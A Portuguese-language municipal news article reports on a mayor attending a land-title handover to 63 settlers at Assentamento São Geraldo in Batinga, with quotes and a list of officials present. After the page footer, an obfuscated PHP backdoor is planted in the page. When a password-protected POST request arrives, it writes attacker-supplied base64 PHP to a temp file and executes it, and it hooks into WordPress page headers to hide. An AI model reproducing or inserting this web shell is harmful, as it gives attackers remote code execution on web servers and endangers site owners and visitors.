• SEJA BEM-VINDO

Prefeito Mildson participa de entrega de títulos no Assentamento São Geraldo

Publicado em: 14/03/2022 Atualizado:: março 14, 2022

 

Os discursos foram ricos em histórias de muito aperto e lutas dos moradores, proprietários, presidentes e parceiros da Associação, para conseguirem as escrituras.

 

O prefeito Mildson Medeiros e sua comitiva participou, na manhã da última sexta-feira (11), da entrega de títulos e escrituras de terras no Assentamento São Geraldo, distrito de Batinga. O evento ocorreu na Escola Dom Pedro I, iniciando com uma oração, que foi conduzida pelo Pastor Lucas. Ao todo foram entregues documentos a 63 donatários, contabilizando 101 títulos. De acordo com o presidente da Associação, Nando Relíquias, foram 24 anos de lutas e muita insistência, para conseguir regularizar a situação dos imóveis rurais.

 

 

O processo de regularização, além do empenho do atual presidente da Associação, Dilermando Relíquias (Morcego), e do ex-presidente, Lucélio Silva, contou com o apoio jurídico do Dr. Hiago Santos, o qual, diante da situação em que se encontrava a documentação, os orientou para que lograssem êxito na legalização.

 

Os discursos foram ricos em histórias de muito aperto e lutas dos moradores, proprietários, presidentes e parceiros da Associação, para conseguirem as escrituras. O atual presidente, Dilermando Reliquias lembrou dos primeiros moradores e de situações que ocorreram no inicio do Assentamento. “Eu cheguei aqui no dia 26 de julho de 1998. A gente viveu 20 anos em um lugar de insegurança, mas, graças a Deus, de quatro anos para cá, nós conseguimos liquidar nossas dívidas e começamos a ter felicidade. Hoje é o maior dia para nós, aqui, na Associação São Geraldo. Quero deixar bem claro para todos os sócios, que uma associação é muito forte. Vamos participar mais, chamar todos para participar das reuniões, continuar juntos, porque juntos nós somos fortes. Sozinhos não conquistaremos nada. Nós somos hoje os maiores produtores de leite do município, produzindo de 2.500 a 3.000 litros por mês, e precisamos ver agora a grandeza que nós somos juntos!”, afirmou o atual presidente, Mildson começou seu discurso fazendo menção do Mês da Mulher, pedindo para a secretária da Saúde, Aline Araújo, que estava presente no local, fazer um levantamento das demandas de cirurgias eletivas do Assentamento. Ele ainda parabenizou os associados e se colocou à disposição da Associação.

 

 

 

“Quero parabenizar a todos os associados e, principalmente, aqueles que trabalharam firme para essa grande conquista. Eu vejo isso como se fosse uma carta de alforria, agora podem fazer o INCRA, o ITR e o CAR, para poder usufruir de um crédito para o pequeno produtor. Quero dizer que nossa secretaria de Agricultura está ativa, mais do que nunca, vamos fazer o cadastro, nós temos maquinários que podem ajudar muito na produção de vocês. Hoje o carro chefe são associações e consórcios, porque falam por muitas pessoas, por isso, apoiem o presidente de vocês, pois ele fala por todos. Quanto a nós enquanto gestão, aquilo que tiver ao nosso alcance, iremos atender sim”, disse o prefeito.

 

 

Funcionários da Secretaria de Agricultura fizeram Cadastro Municipal Rural e entregaram 500 mudas de árvores frutíferas, como açaí, graviola e cacau. Após a cerimônia de entrega dos títulos, o evento seguiu com almoço com churrasco e dois dias comemoração e festa, com shows de João Só Modão e Vinícius Lima.

 

Participaram do evento o vice-prefeito Alex Chaves; os vereadores Deó de Batinga e Gutemberg (Guê); o secretário da Agricultura, Josias Caetano; secretário do Desenvolvimento Econômico, Denilton Porto; secretário de Administração, Sady Teixeira; secretário do Turismo, Windson Mendes; o empresário Leusenilton Soares (Bitôco), o Oficial do registro de imóveis, Carlos Napoleão (Napinho) e produtor rural Jerônimo Esteves.

 

 

Fonte: Jan Santos/Ascom PMI


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}